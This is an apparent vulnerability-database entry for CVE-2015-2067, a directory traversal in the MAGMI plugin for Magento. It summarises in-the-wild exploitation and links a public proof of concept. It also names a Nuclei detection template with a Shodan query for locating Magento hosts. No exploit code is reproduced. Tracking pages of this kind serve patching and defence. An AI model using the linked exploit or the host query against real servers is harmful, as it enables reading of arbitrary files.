CVE-2015-2067

EXPLOITED NUCLEI

MAGMI - Path Traversal via File Parameter

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2015-2067 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 1 public exploit from researchers including SECUPENT. A Nuclei detection template is also available.

AI-analyzed exploit summary The exploit demonstrates a Local File Inclusion (LFI) vulnerability and Cross-Site Scripting (XSS) in the Magento Server MAGMI Plugin. The LFI allows reading arbitrary files via path traversal, while the XSS is achieved through improper input sanitization in URL parameters.

Description

Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.

Exploits (1)

exploitdb WORKING POC
by SECUPENT · textwebappsphp
https://www.exploit-db.com/exploits/35996

The exploit demonstrates a Local File Inclusion (LFI) vulnerability and Cross-Site Scripting (XSS) in the Magento Server MAGMI Plugin. The LFI allows reading arbitrary files via path traversal, while the XSS is achieved through improper input sanitization in URL parameters.

Classification
Working Poc 90%
Attack Type
Info Leak | Xss
Complexity
Trivial
Reliability
Reliable
Target: MAGMI Plugin for Magento
No auth needed
Prerequisites: Access to the MAGMI web interface
devstral-2 · analyzed Feb 16, 2026 Full analysis →

Nuclei Templates (1)

Magento Server MAGMI - Directory Traversal
MEDIUMby daffainfo
Shodan: http.component:"Magento" || http.component:"magento"

References (3)

Core 3
Core References
Exploit, Third Party Advisory, VDB Entry exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/35996
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/74881

Scores

EPSS 0.7638
EPSS Percentile 99.0%

Details

VulnCheck KEV 2020-11-22
CWE
CWE-22
Status published
Products (2)
dweeves/magmi 0Packagist
magmi_project/magmi
Published Feb 24, 2015
Tracked Since Feb 18, 2026